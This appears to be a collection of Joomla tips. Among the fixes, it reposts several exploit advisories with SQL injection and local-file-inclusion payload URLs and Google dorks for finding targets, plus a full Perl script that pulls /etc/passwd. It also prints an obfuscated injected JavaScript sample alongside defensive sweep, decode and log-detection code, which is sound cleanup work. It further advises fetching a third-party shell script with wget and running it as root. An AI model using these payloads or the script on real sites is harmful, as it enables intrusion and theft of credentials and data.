Got error 28 from storage engine SQL in Joomla and company ;)

Well, without beating around the bush: if you are getting the error message Got error 28 from storage engine SQL… have the /tmp folder on your server cleaned out.
Cheers ;). (ONLY CLEAN IT if the message is not Error code 28: No space left on device)

If it is "No space left", check disk space, especially in /tmp and /var; if the space has been exceeded, fix it by deleting whatever is of no use.

dnnViewState SPAM in Joomla: how to solve it (HOW TO SOLVE THIS)

It is common to see older versions of the Joomla CMS being trolled by a flood of web bots; among the filthiest defacements going around today are precisely these 2 (Avast calls it CLICKJACK-A — TROJAN):

<script type="text/javascript" language="JavaScript">// <![CDATA[
function xViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}xViewState();
// ]]></script>

These normally show up as xVIEWSTATE or DNNVIEWSTATE. The way out for xViewState and dnnViewState is to locate those terms in the Joomla files; one file in particular is commonly attacked, modules/mod_AutsonSlideShow/tmpl/default.php. Remove the (JavaScript) function above and the problem is solved!
Legend has it that WordPress suffers from this too.
To sweep your code, use Dreamweaver or any IDE (or even the terminal) that can search all files for a given term (look for dnnView or xView) and you are done!

Cheers!
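The sweep described above, as an added example that is not part of the original post: it walks a site tree for the two function names and also decodes the sample's digit strings statically, so you can see what the script writes without running it. The extension list and the function names `find_infected` and `decode_strings` are assumptions of this example.

```python
import os
import re

# Function names used by the injected script, as named in the post above.
MARKERS = re.compile(rb"\b(?:xViewState|dnnViewState)\b", re.IGNORECASE)
EXTENSIONS = (".php", ".html", ".htm", ".js", ".tpl")  # assumed set of file types

def find_infected(root):
    """Return sorted (path, line_number) pairs where a marker name appears."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(folder, name)
            try:
                with open(path, "rb") as handle:
                    for number, line in enumerate(handle, 1):
                        if MARKERS.search(line):
                            hits.append((path, number))
            except OSError:
                continue  # unreadable file: skip it, keep sweeping
    return sorted(hits)

def decode_strings(encoded):
    """Decode the script's digit strings statically, without running the script.

    Mirrors its loop: entries are walked last to first (a = 1, 2, ...) and every
    two-digit pair becomes chr(pair + 25 - len(encoded) + a).
    """
    count = len(encoded)
    decoded = list(encoded)
    for a in range(1, count + 1):
        digits = encoded[count - a]
        pairs = [digits[i:i + 2] for i in range(0, len(digits) - 1, 2)]
        decoded[count - a] = "".join(chr(int(p) + 25 - count + a) for p in pairs)
    return decoded

# The four strings from the sample script above.
SAMPLE = ["9091968376", "8887918192818786347374918784939277359287883421333333338896",
          "877886888787", "949990793917947998942577939317"]

if __name__ == "__main__":
    print(decode_strings(SAMPLE))
    for path, number in find_infected("."):
        print(f"{path}:{number}")
```

The decoded strings show that the script only writes a style rule that positions the class `nemonn` off-screen, so markup carrying that class is worth searching for in the same sweep.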

Security tip: why should I update my WordPress, Joomla, Drupal or any other web content manager?

Icentral recently published a way to reduce the frequency of attacks against sites that use content management systems (better known as CMSs). The tip is simple and easy to understand, and we strongly recommend reading it. To access the content, click the link below:

http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

Joomla Component (com_jdirectory) SQL Injection Vulnerability

=====================================================================
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I’m Caddy-Dz, member of Exploit-Id
#########################################
======================================================================

####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####

[*] ExpLo!T :

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ …others |
============================================================================================ |

Source: http://www.exploit-db.com/exploits/17603/

Joomla Component mod_spo SQL Injection Vulnerability

# Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7

Simple Page Option – LFI
Vulnerable-Code:
$s_lang =& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Vulnerable-Var:
spo_site_lang=

Expl0iting:
http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd%00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

Repairing?:
Just Filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.

Joomla Component JE K2 Story Submit Local File Inclusion Vulnerability

#! /usr/bin/perl -w

# Joomla Component JE Story Submit Local File Inclusion Vulnerability
# Author : v3n0m
# Date : July, 21-2011 GMT +7:00 Jakarta, Indonesia
# Software : JE Story Submit
# Vendor : http://joomlaextensions.co.in/
# License : GPLv2 or later
# Tested On: Joomla 1.5.x
# irc.yogyacarderlink.web.id - www.yogyacarderlink.web.id
#
# PoC - http://127.0.0.1/[path]/index.php?option=com_jesubmit&view=[LFI]%00
#

use LWP::UserAgent;
use HTTP::Request::Common;

my ($host, $file) = @ARGV ;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|==========================================================|\n";
print "| 'Joomla Component JE Story Submit Local File Inclusion' |\n";
print "| Coded by : v3n0m |\n";
print "| Dork : inurl:com_jesubmit |\n";
print "| |\n";
print "| www.yogyacarderlink.web.id |\n";
print "| |\n";
print "|===================================[ YOGYACARDERLINK ]====|\n";
print "\nUsage: perl $0 \n";
print "\tex: perl $0 http://www.site.com /etc/passwd\n\n";

$host = 'http://'.$host if ($host !~ /^http:/);
$host .= "/" if ($host !~ /\/$/);

my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
$ua->timeout(10);

my $request = HTTP::Request->new();
my $response;
my $url = $host."index.php?";

my $req = HTTP::Request->new(POST => $host."index.php?");
$req->content_type('application/x-www-form-urlencoded');
$req->content("option=com_jesubmit&view=".("/.."x10).$file."%00");

$request = $ua->request($req);
$result = $request->content;

$result =~ s/<[^>]*>//g;

print $result . "\n";
exit;

How to check CMS versions quickly and practically

To check, download the following tool from one of the two addresses below:

root@appunix:~# wget http://server.cmsversion.com/checktest.sh

or

root@appunix:~# wget http://www.libphp.net/checktest.sh

Then do the following:

root@appunix:~# chmod +x checktest.sh

root@appunix:~# ./checktest.sh -u logindeumacontanomeuserver

The output should look something like:

Latest Joomla: 1.5.23
Installed Version: 1.5.20
Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/

This tip works for Joomla, WordPress, WHMCS, etc.

Joomla mdigg Component SQL Injection Vulnerability

=====================================================================

Exploit-ID is the Exploit Information Disclosure
Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####
[*] ExpLo!T :
http://127.0.0.1/?act=story_lists&task=item&link_id=1'
http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]
http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others                                                                              |

============================================================================================ |

 

Source: http://www.exploit-db.com/exploits/17464/

Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability

———————————————————————————
Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability
———————————————————————————

Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios[alt+64]gmail.com
Date : 19 June 2011
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
—————————————————————————

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Calc Builder
version : 0.0.1
Developer : Guillermo Santiago
License : GPLv2 or later type : Commercial
Date Added : 12 June 2011
Price : 9.90 €
Demo : http://components.moonsoft.es/democalcbuilder
Download : http://components.moonsoft.es/downloadcalcbuilder

Description :

CALC BUILDER allows you to create dynamic calculators.
Define your own input user form (types, size, order,validations).
Build results table through PHP code.
Export result table to PDF.
Simple and easy configuration. Three examples included.

—————————————————————————

I.Blind SQL injection (id) Poc/Exploit:
~~~~~~~~~
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 [blind]&fld_5=C

example
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=1&fld_5=C
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=2&fld_5=C

…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=4&fld_5=C
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=5&fld_5=C

A special greeting to my good friends:
R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita 🙂

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Joomla Component (com_team) SQL Injection Vulnerability

********************************************************************************
Joomla Component (com_team) SQL Injection Vulnerability
********************************************************************************

Author : CoBRa_21

Dork : inurl:com_team

********************************************************************************
Exploit

http://localhost/[PATH]/print.php?task=person&id=36 and 1=1

http://localhost/[PATH]/print.php?task=person&id=36 and 1=2

http://localhost/[PATH]/print.php?task=person&id=36 [SQL]

********************************************************************************
Ordu-yu Lojistik TIM // CoBRa_21
********************************************************************************

Source: http://www.exploit-db.com/exploits/17412/

Joomla Component com_joomnik SQL Injection Vulnerability

#############################################################
Joomla Component Joomnik Gallery SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 26.05.2011
# Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line
# Name : Joomla com_joomnik
# Bug Type : SQL injection
# Infection : Admin login details can be obtained.
# Example Vuln :
[+]/index.php?option=com_joomnik&album=[EXPLOIT]
[+] Dork:"com_joomnik"
[+] Demo: http://site.com/index.php?option=com_joomnik&album=6'
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################

http://joomlacode.org/gf/project/joomnik/
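For whoever runs the affected sites, an added example (not taken from any of the advisories above) that flags the request shapes they describe in a web server access log: traversal and null bytes in a parameter such as spo_site_lang, and non-numeric or boolean-test values in id, link_id and album. The log lines are constructed, the Combined Log Format is assumed, and the rule names are this example's own; parameters sent in a POST body, as in the JE Story Submit script, do not appear in such a log.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisories above inject into; all are meant to hold integers.
NUMERIC_PARAMS = {"id", "link_id", "album"}
RULES = [
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("null-byte", re.compile(r"\x00")),
    ("sqli-boolean", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.IGNORECASE)),
    ("sqli-function", re.compile(r"@@version|substring\s*\(", re.IGNORECASE)),
]
# Combined Log Format: client address first, request line in double quotes.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return the sorted rule names triggered by the decoded query parameters."""
    hits = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits.update(rule for rule, pattern in RULES if pattern.search(value))
        if name in NUMERIC_PARAMS and not value.isdigit():
            hits.add("non-numeric-id")
    return sorted(hits)

def scan(lines):
    """Return (client, url, findings) for each log line with a finding."""
    flagged = []
    for line in lines:
        match = LOG_RE.match(line)
        findings = classify(match.group(2)) if match else []
        if findings:
            flagged.append((match.group(1), match.group(2), findings))
    return flagged

# Constructed log lines (documentation addresses), modelled on the request shapes above.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jul/2011:10:00:01 +0000] "GET /index.php?option=com_joomnik&album=6 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [21/Jul/2011:10:00:07 +0000] "GET /index.php?option=com_joomnik&album=6%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [21/Jul/2011:10:01:12 +0000] "GET /print.php?task=person&id=36%20and%201=2 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [21/Jul/2011:10:01:15 +0000] "GET /index.php?option=com_calcbuilder&controller=calcbuilder&format=raw&id=3+and+substring(@@version,1,1)=5&fld_5=C HTTP/1.1" 200 90',
    '203.0.113.5 - - [21/Jul/2011:10:02:30 +0000] "GET /modules/mod_spo/email_sender.php?spo_site_lang=../../../../etc/passwd%00&spo_url_type=1 HTTP/1.1" 200 1733',
]

if __name__ == "__main__":
    for client, url, findings in scan(SAMPLE_LOG):
        print(client, ",".join(findings), url)
```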

Warning: Parameter 2 to frontpage() expected to be a reference

This is a problem that has been plaguing Joomla users on versions 1.0.x (x varies). It can also occur because the PHP version in use is 5.3.x.
To fix this problem, you need to apply a patch that replaces 2 files:

/includes/Cache/Lite/Function.php
# Fixes the reference value

/includes/vcard.class.php
# Fixes problems with forms.

The patch is available at the link below:
http://www.libphp.net/fix_joomla_10x_php_530.zip